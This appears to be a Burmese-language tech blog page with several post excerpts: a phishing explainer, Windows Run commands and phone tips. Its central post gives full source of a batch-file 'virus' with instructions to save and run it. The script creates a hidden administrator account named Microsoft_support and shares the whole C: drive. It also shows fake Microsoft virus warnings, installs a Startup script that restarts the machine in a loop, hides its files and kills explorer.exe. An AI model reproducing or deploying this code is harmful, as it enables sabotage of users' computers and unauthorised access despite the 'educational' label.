 Phishing ဆုိတာ အေယာင္ေဆာင္ျပီးေတာ့ သူမ်ားေတြရဲ႕ password ေတြ, data ေတြကုိခုိးယူဖုိ႕ၾကိဳးစားတဲ့နည္းပါပဲ။ ဥပမာေျပာရရင္ေတာ့ ခင္ဗ်ားဆီကုိ paypal မွ Message တစ္ေစာင္ေရာက္လာတယ္။ ခင္ဗ်ားရဲ႕ username နဲ႕  password ကုိေပးဖုိ႕၊ အဲဒီမွာေျပာထားမွာက ခင္ဗ်ားရဲ႕ Profile ကုိ ပုိျပီး လုံျခံဳေအာင္၊ ဘာညာေပါ့ေလ။ ဒါေပမယ့္ Mail ထဲမွာပုိ႔ထားတဲ့လိပ္စာရဲ႕ Link ကေတာ့ paypall ျဖစ္ေနတယ္။ အေသခ်ာၾကည့္ရင္ paypal နဲ႕ paypal က မတူဘူးေနာ္။ l တစ္ခုပုိေနတာ သတိထားၾကည့္ရင္ သိႏုိင္တယ္္။ ဒါေပမယ့္ သာမန္ user ေတြဆုိရင္ သတိမထားမိဘဲ အလြယ္တကူေပးမိႏုိင္တာေပါ့။ ဒီလုိနဲ႕ပဲ ခင္ဗ်ားဆီက data ေတြ၊ အေရးၾကီးတဲ့ 
Read more »

C_relwarC708 v1.0 Virus Source Code

Bat File Programming စာအုပ္မွာေတြ႕တာကုိ ဖတ္မိျပီး တင္လုိက္တာပါ။ Educational Purpose သက္သက္သာျဖစ္ေၾကာင္း တင္ျပလုိပါတယ္။ ဒါေၾကာင့္ ဒီကုတ္ေတြကုိ မဟုတ္တဲ့ေနရာမွာ အသုံးမခ်ၾကပါနဲ႔။ ေအာက္က code line ေတြကုိ Notepad ေပၚမွာ Copy>paste လုပ္ျပီး .bat ဖုိင္နဲ႕သိမ္းလုိက္ရင္ရပါတယ္။ ဒီကုဒ္ ဘယ္လုိ အလုပ္လုပ္လဲဆုိတာ အနည္းငယ္ရွင္းျပပါမယ္။ ပထမဆုံးကေတာ့ C:|Windows\System32 ေအာက္မွာ 1001 ဆုိတဲ့ Folder, Microsoft_support ဆုိတဲ့ user account နဲ႕အတူ အခ်ိန္ကုိ 12:00 နဲ႕ Date ကုိ 01-01-2000 

အျဖစ္ေျပာင္းပစ္လုိက္ပါတယ္။ ျပီးေတာ့ Microsoft_support အေကာင့္က Administrative right ျဖစ္တယ္ေနာ္။ ေနာက္ warnusr.vbs ဆုိတဲ့ VB Script ဖုိင္ကုိတည္ေဆာက္လုိက္ျပီး "Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or Press No to Ignore the Virus" ဆုိတဲ့စာသား Message ေပၚလာပါမယ္။ မသိရင္ေတာ့ Microsoft ကပုိ႔ထားသလုိလုိေပါ့ဗ်ာ။ Code Line က System ရဲ႕  Date နဲ႕ Time ကုိ 12:01 နဲ႕ 12:02 မွာေျပာင္းထားျပီးသားျဖစ္လုိ႔  "You are requested to restart your Computer Now to prevent Damages or Data loss" ဆုိတဲ့ Message ကုိျမင္ရပါမယ္။ အေၾကာင္းမသိတဲ့ User တစ္ေယာက္က Restart လုပ္ရင္ ခင္ဗ်ားကြန္ပ်ဴတာက Restart နဲ႕လည္ေနမွာျဖစ္ပါတယ္။ ေျဖရွင္းရန္နည္းလမ္းကေတာ့ ကြန္ပ်ဴတာကုိ Safe Mode နဲ႕ဝင္ျပီး C:\Windows\System32 ေအာက္က 1001 ဆုိတဲ့ Folder ကုိ Delete လုပ္ရမွာျဖစ္ပါတယ္။

@echo off
cd\
cd %SystemRoot%\system32\
md 1001
cd\
cls
rem N0 H4rm 15 cau53d unt1| N0w
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| ch4ng3 th3 t1m3 2 12:00:00.0 & d4t3 as 01/01/2000
echo 12:00:00.00 | time >> nul
echo 01/01/2000 | date >> nul
net users Microsoft_support support /add
rem Th3 u53r 4cc0unt th4t w45 Cr34t3d 15 ju5t 4 |1m1t3d 4cc0unt
rem Th15 p13c3 0f c0d3 w1|| m4k3 th3 |1m1t3d u53r 4cc0unt5 t0 4dm1n15tr4t0r 4cc0unt.
net localgroup administrators Microsoft_support /add
rem 5h4r3 th3 R00t Dr1v3
net share system=C:\ /UNLIMITED
cd %SystemRoot%\system32\1001
echo deal=msgbox (”Microsoft Windows recently had found some Malicious Virus on your
computer, Press Yes to Neutralize the virus or Press No to Ignore the Virus”,20,”Warning”) >
%SystemRoot%\system32\1001\warnusr.vbs
rem ch4ng35 th3 k3yb04rd 53tt1ng5 ( r4t3 4nd d3|4y )
mode con rate=1 > nul
mode con delay=4 >> nul129
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y 50m3 4nn0y1ng m5g, as c0d3d ab0v3, 3×4ct|y
@ 12:01 and 12:02
at 12:01 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”
at 12:02 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”
msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” > nul
msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” >>
nul
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| c0py th3 warnusr.vbs f1|3 2 th3 5t4rtup, th4t w1|| b3
3×3cut3d @ 3v3ryt1me th3 c0mput3r 5t4rt5
copy %SystemRoot%\system32\1001\warnusr.vbs “%systemdrive%\Documents and Settings\All
Users\Start Menu\Programs\Startup\warnusr.vbs”
rem
***************************************************************************
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y Th3 5hutd0wn d14|05 B0X w1th 50m3 m5g and
w1|| r35t4rt c0nt1nu0u5|y
echo shutdown -r -t 00 -c “Microsoft has encountered a seriuos problem, which needs your
attention right now. Hey your computer got infected by Virus. Not even a single anti-virus can
detect this virus now. Wanna try? Hahahaha….! ” > %systemroot%\system32\1001\sd.bat
copy %systemroot%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat
“%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat”
rem
***************************************************************************
cd\
cls
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| m4k3 th3 v1ru5 b1t 5t34|th13r
cd %systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\
attrib +h +s +r warnusr.vbs
attrib +h +s +r sd.bat
cd\130
cd %systemroot%\system32
attrib +h +s +r 1001
rem K1||5 th3 3xp|0r3r.3×3 Pr0c355
taskkill /F /IM explorer.exe
rem @ EOV // End of Virus

Read more »

Run Line Command မ်ား

ဒါေလးကုိေတာ့ အက်ယ္ခ်ဲျပီး မရွင္းျပေတာ့ပါဘူး။ Windows အသုံးျပဳသူေတြ Run box ကေနအလြယ္တကူ ေခၚယူျပီးသုံးလုိ႔ရတဲ့ command ေတြျဖစ္ပါတယ္။ အသုံးဝင္မယ့္ command မ်ားကုိ စုစည္းေဖာ္ျပထားပါတယ္။ Windows XP မွာစမ္းသပ္ထားျခင္းပါ။ Windows 7 မွာေတာ့ အခ်ဳိ႕ေသာ Command ေတြက ေျပာင္းလဲမွဳရွိႏုိင္ပါတယ္။ အားလုံး အဆင္ေျပၾကပါေစ။

Read more »

သင့္လက္ကိုင္ဖုန္း လုပ္ႏိုင္တဲ့ လူသိနည္းတဲ့နည္းေလးခ်က္

ဒါေလးကေတာ့ လူတုိင္းသိဖူးျပီးသားလည္းျဖစ္မွာပါ။  ေဖ့ဘြတ္မွာေတာ့ ေတြ႔ရပါတယ္။ မသိေသးမ်ားအတြက္ ရည္ရြယ္ပါတယ္။ ဒါေပမယ့္ ဒီထဲကအေၾကာင္းအရာ Function ေတြအားလုံးကုိေတာ့ ျမန္မာႏုိင္ငံမွာ မရႏုိင္ေသးပါဘူး။ ဗဟုသုတအျဖစ္ေပါ့ဗ်ာ။
အသက္ကယ္ ပစၥည္း သို႕မဟုတ္ ရွင္သန္ ရုန္းကန္ ႏိုင္ဖြယ္ရာ အေရးေပၚ အေထာက္အကူ ပစၥည္း ျဖစ္ႏိုင္ပါသတဲ့။

Read more »